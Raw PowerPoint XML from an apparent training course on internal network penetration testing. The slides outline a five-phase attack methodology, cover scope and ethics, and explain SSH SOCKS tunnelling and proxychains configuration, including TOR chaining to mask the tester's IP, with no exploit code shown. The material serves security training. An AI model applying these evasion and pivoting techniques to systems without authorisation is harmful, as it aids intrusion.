          <a:schemeClr val="accent4">
            <a:alpha val="90000"/>
            <a:tint val="40000"/>
            <a:hueOff val="0"/>
            <a:satOff val="0"/>
            <a:lumOff val="0"/>
            <a:alphaOff val="0"/>
          </a:schemeClr>
        </a:solidFill>
        <a:ln w="12700" cap="rnd"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0780" tIns="177800" rIns="130780" bIns="177800" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>Make a throwaway account on your attacking machine (SSHD Server) with the permissions of /bin/false, preventing third parties from compromising the connection.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2149077" y="686"/>
        <a:ext cx="6447234" cy="9587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4B2F4-DD2F-4E46-88F8-3B543245138A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781118" y="849169"/>
          <a:ext cx="607775" cy="91440"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="45720"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="607775" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="1270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9046" y="891697"/>
        <a:ext cx="31918" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B8437356-5A2E-4971-9BEC-D61C7C1473B7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7373" y="62226"/>
          <a:ext cx="2775545" cy="1665327"/>
        </a:xfrm>
        <a:prstGeom prst="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755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200" dirty="0"/>
            <a:t>1. Gaining access, host discovery and initial port scanning. (Enumeration) (20% Recon)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7373" y="62226"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0EC34BD3-2C93-417B-88C1-EF53B36A7813}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6195039" y="849169"/>
          <a:ext cx="607775" cy="91440"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="45720"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="607775" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="831752"/>
              <a:satOff val="-16830"/>
              <a:lumOff val="52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82967" y="891697"/>
        <a:ext cx="31918" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8A6F1EA7-F0B2-44DB-A712-1FA54A1B57D6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3421293" y="62226"/>
          <a:ext cx="2775545" cy="1665327"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="623814"/>
                <a:satOff val="-12622"/>
                <a:lumOff val="392"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent5">
                <a:hueOff val="623814"/>
                <a:satOff val="-12622"/>
                <a:lumOff val="392"/>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755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200" dirty="0"/>
            <a:t>2. Enumerating the ports, gathering deeper information on our target. (Further Enumeration) (20% Recon)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3421293" y="62226"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4C30AB2A-BEA4-4FF7-9249-A332FC473159}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1395145" y="1725753"/>
          <a:ext cx="6827841" cy="607775"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="6827841" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="6827841" y="320987"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="320987"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="607775"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="1663504"/>
              <a:satOff val="-33659"/>
              <a:lumOff val="104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37626" y="2026449"/>
        <a:ext cx="342880" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C8A2B6E0-571E-42FF-96EA-F45168ADBAA7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6835214" y="62226"/>
          <a:ext cx="2775545" cy="1665327"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="1247628"/>
                <a:satOff val="-25244"/>
                <a:lumOff val="784"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent5">
                <a:hueOff val="1247628"/>
                <a:satOff val="-25244"/>
                <a:lumOff val="7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755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t>3. Attempt to evade any defences. (Defence Evasion) (20% Recon/10% Exploitation)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6835214" y="62226"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{24938DF2-A889-4F57-8DDF-8030988E3F39}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2781118" y="3152872"/>
          <a:ext cx="607775" cy="91440"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="45720"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="607775" y="45720"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="12700" cap="rnd" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:hueOff val="2495256"/>
              <a:satOff val="-50489"/>
              <a:lumOff val="156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9046" y="3195400"/>
        <a:ext cx="31918" cy="6383"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{362E644A-1BE4-4C60-B574-E3819A0EECEB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7373" y="2365928"/>
          <a:ext cx="2775545" cy="1665327"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="1871442"/>
                <a:satOff val="-37867"/>
                <a:lumOff val="1177"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent5">
                <a:hueOff val="1871442"/>
                <a:satOff val="-37867"/>
                <a:lumOff val="11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755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t>4. Attempt to escalate privileges within our beachhead machine. (40% Exploitation)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7373" y="2365928"/>
        <a:ext cx="2775545" cy="1665327"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E1CFEE78-32C0-423F-80D7-647EC914687F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3421293" y="2365928"/>
          <a:ext cx="2775545" cy="1665327"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent5">
                <a:hueOff val="2495256"/>
                <a:satOff val="-50489"/>
                <a:lumOff val="1569"/>
                <a:alphaOff val="0"/>
                <a:tint val="96000"/>
                <a:lumMod val="100000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="78000">
              <a:schemeClr val="accent5">
                <a:hueOff val="2495256"/>
                <a:satOff val="-50489"/>
                <a:lumOff val="156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755650">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-GB" sz="1700" kern="1200"/>
            <a:t>5. Attempt lateral movement to deeper subnets and exfiltrate information (Post-exploitation) (20% Recon)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3421293" y="2365928"/>
        <a:ext cx="2775545" cy="166532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4687B1-4DF4-4FBA-A22B-24D3AECB358A}" type="datetimeFigureOut">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>07/04/2022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3F376A-C6F6-4B67-A7B6-C5BEC9567C98}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2610380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and welcome to the internal network penetration testing section of this course: Offensive Security Tactics for Linux Professionals.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{323F376A-C6F6-4B67-A7B6-C5BEC9567C98}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2431766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agenda will involve a discussion of a methodology for internal testing. Further we’ll discuss the purpose and contexts of internal testing to give some background as to why we do it and what kind of threats we want to mitigate.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Next we’ll be talking about key considerations of an internal test from both a business based perspective and a technical based perspective.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Next we’ll be moving on to techniques of testing the internal network and methods of testing. From these slides you will have been introduced </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{323F376A-C6F6-4B67-A7B6-C5BEC9567C98}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="465534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part of penetration testing, you not only must consider the technical challenges such as potential defences and remaining  undetected if applicable. You also need to make considerations from a business/ethics perspective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Which brings my first and probably one of the most important points to be acknowledged during a test which is to stay in scope. When a penetration test is agreed, it is required for the client and tester to have a conversation in which the rules of engagement are defined. In this discussion, a scope is also included which is a list of hosts you are authorised to attack in addition to the methods you’re allowed to use. This covers ethics during the test and ensures that both parties are aware of the restrictions. If the tester however ends up out of scope, it is required for the tester to make mention of and document this as a form of de-confliction. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Therefore anyone who may have been affected can be informed of the incident being because of a penetration test happening and the tester going out of scope. It is definitely not intended to go out of scope. However human error can happen and we must account for this. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{323F376A-C6F6-4B67-A7B6-C5BEC9567C98}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3095846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SOCKS tunnel as seen in the image helps you to route TCP/UDP traffic into the target network allowing you to use whatever tools you would be using from the outside through to the inside.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{323F376A-C6F6-4B67-A7B6-C5BEC9567C98}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="555946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3F376A-C6F6-4B67-A7B6-C5BEC9567C98}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2741385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4/7/2022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06593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4/7/2022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2206273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4/7/2022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32383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4/7/2022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3311707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4/7/2022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94465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4/7/2022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4235903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157047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4259072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4/7/2022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947477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196603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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/7/2022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578041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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/7/2022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758660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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/7/2022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575149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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/7/2022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546834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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/7/2022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941389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EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>4/7/2022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4136768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2EDB8D0-98ED-4B86-9D5F-E61ADC70144D}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>4/7/2022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928589751"/>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aqeebhussain122/portninja/tree/master/code/scanner/raw_python"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redhat.com/sysadmin/ssh-dynamic-port-forward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A group of toothbrushes&#10;&#10;Description automatically generated with low confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{03FE2716-7A29-4BA1-8A75-D042DC964F0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88" r="-1" b="170"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12188932" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D54E649E-FCFC-4D42-92F0-153BC374E0F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="861099" y="2578214"/>
            <a:ext cx="10466773" cy="2490935"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Introduction to Internal Network Penetration Testing - Offensive Security Tactics for Linux Professionals</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17269484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D760B83-0A67-4263-9C49-DD06CA78E607}"/>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Configuring SOCKS on SSH: Configure Proxychains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B2A7F98-6EE6-4127-829D-E17C8372B92B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="2160589"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Uncomment the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strict_chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Strict chains use the specified proxies in the configuration file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Alternatively, the “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>random_chain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>” can be chosen which is more suitable when making use of the TOR protocol to mask IP and connect from a TOR exit node.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="116590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60B83-0A67-4263-9C49-DD06CA78E607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Configuring SOCKS on SSH: Configure Proxychains</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F2AA33A-6AF6-48A8-AD0B-0270D80EEC59}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3665536" y="1930400"/>
            <a:ext cx="2781446" cy="3044778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102916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60B83-0A67-4263-9C49-DD06CA78E607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Configuring SOCKS on SSH: Configure Proxychains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C50A18A9-2265-4CFE-A33E-0322E9C3A335}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
